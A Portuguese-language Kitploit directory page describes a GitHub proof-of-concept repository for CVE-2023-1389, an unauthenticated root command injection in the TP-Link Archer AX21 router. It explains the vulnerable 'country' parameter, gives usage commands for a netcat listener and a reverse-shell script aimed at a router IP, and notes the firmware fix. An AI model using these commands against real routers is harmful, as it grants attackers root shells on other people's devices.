Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-1389 — Provas de conceito para CVE-2023-1389, uma injeção de comando não autenticada no TP-Link Archer AX21, fornecendo capacidades de transferência de arquivos e shell reverso. | Kitploit
Ferramentas/GitHubGitHub/voyag3r-security/cve-2023-1389
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleRed TeamingDesenvolvimento de Payloads
GitHubvoyag3r-security/cve-2023-1389

CVE-2023-1389

Provas de conceito para CVE-2023-1389, uma injeção de comando não autenticada no TP-Link Archer AX21, fornecendo capacidades de transferência de arquivos e shell reverso.

Ver Repositório
1774há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Descrição

CVE-2023–1389 é uma vulnerabilidade de Injeção de Comando não Autenticada no roteador WiFi TP-Link Archer AX21. Um callback no parâmetro country usa a função popen(), que é executada como root, permitindo que o atacante injete valores arbitrários através de requisições GET ou POST na interface de administração, sem exigir autenticação. Mais detalhes sobre a vulnerabilidade podem ser encontrados aqui.

Estas são algumas provas de conceito que criei enquanto explorava a injeção de comando. O Archer-file-transfer.py foi a primeira iteração e é bastante complicado na forma como alcança a interação. O Archer-rev-shell.py oferece um shell reverso netcat simples, e é provavelmente o que você está procurando. Se quiser saber mais sobre o desenvolvimento destes scripts, pode ler o post aqui.

Uso

Em uma janela do terminal:

root@kitploit:~
nc your_IP listener_port

Em uma segunda janela do terminal:

root@kitploit:~
python3 archer-rev-shell.py -r router_IP -a your_IP -p listner_port

Mitigação

A TP-Link lançou a versão de firmware 1.1.4 Build 20230219 que corrige o problema removendo o callback vulnerável. Atualizar o roteador para o firmware mais recente deve proteger o seu dispositivo.

Futuro

Provavelmente não manterei essas PoCs. Ambas são bastante simples e devem ser fáceis de modificar conforme necessário.

Baixar ferramenta